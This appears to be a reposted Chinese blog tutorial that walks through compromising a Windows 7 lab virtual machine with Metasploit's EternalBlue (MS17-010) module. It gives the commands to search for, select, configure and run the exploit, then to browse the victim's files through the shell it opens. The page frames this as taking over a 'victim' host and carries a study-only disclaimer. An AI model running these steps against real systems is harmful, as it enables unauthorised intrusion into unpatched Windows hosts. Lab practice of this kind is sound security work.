当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- Introduction to Google software testing
- Elasticsearch 第六篇:聚合統計查詢
- 车的换道检测
- Menu permission control configuration of hub plug-in for azure Devops extension
- Troubleshooting and summary of JVM Metaspace memory overflow
- Jmeter——ForEach Controller&Loop Controller
- 数字城市响应相关国家政策大力发展数字孪生平台的建设
- Calculation script for time series data
- PLC模拟量输入和数字量输入是什么
- [C#] (原創)一步一步教你自定義控制元件——04,ProgressBar(進度條)
猜你喜欢
用Keras LSTM构建编码器-解码器模型
在大规模 Kubernetes 集群上实现高 SLO 的方法
自然语言处理之命名实体识别-tanfordcorenlp-NER(一)
容联完成1.25亿美元F轮融资
如何将数据变成资产?吸引数据科学家
“颜值经济”的野望:华熙生物净利率六连降,收购案遭上交所问询
Use of vuepress
How long does it take you to work out an object-oriented programming interview question from Ali school?
多机器人行情共享解决方案
This article will introduce you to jest unit test
随机推荐
Using Es5 to realize the class of ES6
How to get started with new HTML5 (2)
使用 Iceberg on Kubernetes 打造新一代云原生数据湖
加速「全民直播」洪流,如何攻克延时、卡顿、高并发难题?
How do the general bottom buried points do?
The practice of the architecture of Internet public opinion system
Vue 3 responsive Foundation
神经网络简史
Cos start source code and creator
一时技痒,撸了个动态线程池,源码放Github了
快快使用ModelArts,零基礎小白也能玩轉AI!
Every day we say we need to do performance optimization. What are we optimizing?
Python自动化测试学习哪些知识?
Subordination judgment in structured data
01 . Go语言的SSH远程终端及WebSocket
至联云解析:IPFS/Filecoin挖矿为什么这么难?
直播预告 | 微服务架构学习系列直播第三期
阿里云Q2营收破纪录背后,云的打开方式正在重塑
数据产品不就是报表吗?大错特错!这分类里有大学问
Flink的DataSource三部曲之二:内置connector